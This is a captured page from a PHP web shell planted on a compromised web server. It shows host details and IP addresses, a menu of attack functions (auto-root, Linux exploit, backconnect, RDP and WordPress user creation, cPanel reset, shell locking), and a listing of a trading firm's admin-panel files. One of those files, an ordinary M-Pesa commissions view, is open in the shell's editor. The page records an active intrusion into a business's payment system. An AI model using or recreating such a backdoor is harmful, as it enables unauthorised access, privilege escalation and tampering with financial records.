Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.36
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
admin.tradesense.co.ke /
app /
Views /
[ HOME SHELL ]
Name
Size
Permission
Action
errors
[ DIR ]
drwxr-xr-x
addclient.php
13.22
KB
-rw-r--r--
addcourse.php
10.32
KB
-rw-r--r--
agentclients.php
14.58
KB
-rw-r--r--
agentcommision.php
15.05
KB
-rw-r--r--
agentinfo.php
34.21
KB
-rw-r--r--
agents.php
15.08
KB
-rw-r--r--
clientinfo.php
13.2
KB
-rw-r--r--
clientprofile.php
16.85
KB
-rw-r--r--
clients.php
14.58
KB
-rw-r--r--
commissioninfo.php
33.24
KB
-rw-r--r--
eftapproved.php
15.98
KB
-rw-r--r--
eftapproved15.php
16.16
KB
-rw-r--r--
eftpaid.php
13.96
KB
-rw-r--r--
eftpaid15.php
15.82
KB
-rw-r--r--
eftpaid3.php
13.95
KB
-rw-r--r--
eftunapproved.php
15.69
KB
-rw-r--r--
index.php
20.56
KB
-rw-r--r--
login.php
7.08
KB
-rw-r--r--
mpesaapproved - Copy.php
15.81
KB
-rw-r--r--
mpesaapproved.php
15.98
KB
-rw-r--r--
mpesaapproved15 - Copy.php
15.83
KB
-rw-r--r--
mpesaapproved15.php
16.17
KB
-rw-r--r--
mpesapaid.php
13.95
KB
-rw-r--r--
mpesapaid15.php
16.36
KB
-rw-r--r--
mpesapaid3.php
13.95
KB
-rw-r--r--
mpesaunapproved.php
15.68
KB
-rw-r--r--
nav.php
25.68
KB
-rw-r--r--
news.php
4.65
KB
-rw-r--r--
notifications.php
8.66
KB
-rw-r--r--
payment-confirmation.php
7.83
KB
-rw-r--r--
profile.php
12.83
KB
-rw-r--r--
register.php
8.35
KB
-rw-r--r--
rejected.php
14.54
KB
-rw-r--r--
rtgsapproved.php
15.98
KB
-rw-r--r--
rtgsapproved15.php
16.17
KB
-rw-r--r--
rtgspaid.php
13.93
KB
-rw-r--r--
rtgspaid15.php
16.35
KB
-rw-r--r--
rtgspaid3.php
13.96
KB
-rw-r--r--
rtgsunapproved.php
15.68
KB
-rw-r--r--
students.php
14.66
KB
-rw-r--r--
transactions.php
14.47
KB
-rw-r--r--
transinfo.php
16.21
KB
-rw-r--r--
verified.php
14.64
KB
-rw-r--r--
welcome_message.php
17.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mpesaapproved.php
<div class="vertical-overlay"></div> <!-- ============================================================== --> <!-- Start right Content here --> <!-- ============================================================== --> <div class="main-content"> <div class="page-content"> <div class="container-fluid"> <!-- start page title --> <div class="row"> <div class="col-12"> <div class="page-title-box d-sm-flex align-items-center justify-content-between"> <h4 class="mb-sm-0">Mpesa Approved Commissions</h4> <div class="page-title-right"> <ol class="breadcrumb m-0"> <li class="breadcrumb-item"><a href="javascript: void(0);">Mpesa Approved Commissions</a></li> <li class="breadcrumb-item active">Mpesa Approved Commissions</li> </ol> </div> </div> </div> </div> <!-- end page title --> <form method="post" > <div class="row"> <div class="col-lg-12"> <div class="card"> <div class="card-header"> <h4 class="card-title mb-0">My Transactions</h4> </div><!-- end card header --> <div class="card-body"> <div id="customerList"> <div class="row g-4 mb-3"> <div class="col-sm-auto"> <div class="col-sm"> <div class="d-flex justify-content-sm-end"> <div class="live-preview"> <div class="d-flex flex-wrap gap-2"> <button type="submit" name="excel" value="excel" class="btn btn-primary waves-effect waves-light">Generate Excel</button> </div></div> </div> </div> </div> <div class="col-sm"> <div class="d-flex justify-content-sm-end"> <div class="search-box ms-2"> <input type="text" class="form-control search" placeholder="Search..."> <i class="ri-search-line search-icon"></i> </div> </div> </div> </div> <button type="submit" name="update" value="update" class="btn btn-secondary waves-effect waves-light">Update Status</button> <div class="table-responsive table-card mt-3 mb-1"> <?php if(session()->getFlashdata('ms')):?> <div class="alert alert-success"><?= session()->getFlashdata('ms') ?></div> <?php endif;?> <table class="table align-middle table-nowrap" id="customerTable"> <thead class="text-muted table-light"> <tr> <th scope="col" style="width: 50px;"> <div class="form-check"> <input class="form-check-input" type="checkbox" id="checkAll" value="option"> </div> </th> <th scope="col">Com ID</th> <th scope="col">Commision </th> <th scope="col">Amount</th> <th scope="col">Client </th> <th scope="col">Payment expected </th> <th scope="col">Date Created</th> </tr> </thead> <tbody> <?php foreach ($merch as $student): ?> <tr> <th scope="row"> <div class="form-check"> <input class="form-check-input" name="id[]" type="checkbox" value="<?= $student['id'] ?>"> </div> </th> <td> <a href="#" class="fw-medium link-primary"> <?= $student['id'] ?> </td> <td> <div class="d-flex align-items-center"> <div class="flex-grow-1"><?= $student['amount'] ?></div> </div> </td> <td><?= $student['paid'] ?></td> <td> <span class="text-success"><?php $id= $student['customerid']; $studentModel = new \App\Models\StudentsModel(); $daa = $studentModel->where('id', $id)->first(); echo $daa['fullname']; ?></span> </td> <td><?php $dat = date('Y-m-d'); $start = new DateTime($dat); $end = new DateTime($student['expect']); $interval = $start->diff($end); echo $interval->format('%m Months %d days '); // Start date ?></td> <td><?= $student['datecreated'] ?></td> <td> </td> </tr><!-- end tr --> <?php endforeach; ?> </tbody><!-- end tbody --> </table><!-- end table --> <div class="noresult" style="display: none"> <div class="text-center"> <lord-icon src="https://cdn.lordicon.com/msoeawqm.json" trigger="loop" colors="primary:#121331,secondary:#08a88a" style="width:75px;height:75px"></lord-icon> <h5 class="mt-2">Sorry! No Result Found</h5> <p class="text-muted mb-0">We've searched more than 150+ Orders We did not find any orders for you search.</p> </div> </div> </div> </form> <div class="d-flex justify-content-end"> <div class="pagination-wrap hstack gap-2"> <a class="page-item pagination-prev disabled" href="#"> Previous </a> <ul class="pagination listjs-pagination mb-0"></ul> <a class="page-item pagination-next" href="#"> Next </a> </div> </div> </div> </div><!-- end card --> </div> <!-- end col --> </div> <!-- end col --> </div> <!-- end row --> <!-- end row --> </div> <!-- end row --> <div class="modal fade" id="showModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered"> <div class="modal-content"> <div class="modal-header bg-light p-3"> <h5 class="modal-title" id="exampleModalLabel"></h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close" id="close-modal"></button> </div> <form> <div class="modal-body"> <div class="mb-3" id="modal-id" style="display: none;"> <label for="id-field" class="form-label">ID</label> <input type="text" id="id-field" class="form-control" placeholder="ID" readonly /> </div> <div class="mb-3"> <label for="customername-field" class="form-label">Customer Name</label> <input type="text" id="customername-field" class="form-control" placeholder="Enter Name" required /> </div> <div class="mb-3"> <label for="email-field" class="form-label">Email</label> <input type="email" id="email-field" class="form-control" placeholder="Enter Email" required /> </div> <div class="mb-3"> <label for="phone-field" class="form-label">Phone</label> <input type="text" id="phone-field" class="form-control" placeholder="Enter Phone no." required /> </div> <div class="mb-3"> <label for="date-field" class="form-label">Joining Date</label> <input type="text" id="date-field" class="form-control" placeholder="Select Date" required /> </div> <div> <label for="status-field" class="form-label">Status</label> <select class="form-control" data-trigger name="status-field" id="status-field"> <option value="">Status</option> <option value="Active">Active</option> <option value="Block">Block</option> </select> </div> </div> <div class="modal-footer"> <div class="hstack gap-2 justify-content-end"> <button type="button" class="btn btn-light" data-bs-dismiss="modal">Close</button> <button type="submit" class="btn btn-success" id="add-btn">Add Customer</button> <button type="button" class="btn btn-success" id="edit-btn">Update</button> </div> </div> </form> </div> </div> </div> <!-- Modal --> <!--end modal --> </div> <!-- container-fluid --> </div> <!-- End Page-content --> <footer class="footer"> <div class="container-fluid"> <div class="row"> <div class="col-sm-6"> <script>document.write(new Date().getFullYear())</script> © Trade Sense Ltd. </div> </div> </div> </footer> </div> <!-- end main content--> </div> <!-- END layout-wrapper --> <!--start back-to-top--> <button onclick="topFunction()" class="btn btn-danger btn-icon" id="back-to-top"> <i class="ri-arrow-up-line"></i> </button> <!--end back-to-top--> <!-- Theme Settings --> <!-- JAVASCRIPT --> <script src="assets/libs/bootstrap/js/bootstrap.bundle.min.js"></script> <script src="assets/libs/simplebar/simplebar.min.js"></script> <script src="assets/libs/node-waves/waves.min.js"></script> <script src="assets/libs/feather-icons/feather.min.js"></script> <script src="assets/js/pages/plugins/lord-icon-2.1.0.js"></script> <script src="assets/js/plugins.js"></script> <!-- prismjs plugin --> <script src="assets/libs/prismjs/prism.js"></script> <script src="assets/libs/list.js/list.min.js"></script> <script src="assets/libs/list.pagination.js/list.pagination.min.js"></script> <!-- listjs init --> <script src="assets/js/pages/listjs.init.js"></script> <!-- Sweet Alerts js --> <script src="assets/libs/sweetalert2/sweetalert2.min.js"></script> <!-- App js --> <script src="assets/js/app.js"></script> </body> <!-- Mirrored from themesbrand.com/velzon/html/default/tables-listjs.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 25 May 2022 18:05:12 GMT --> </html>
Close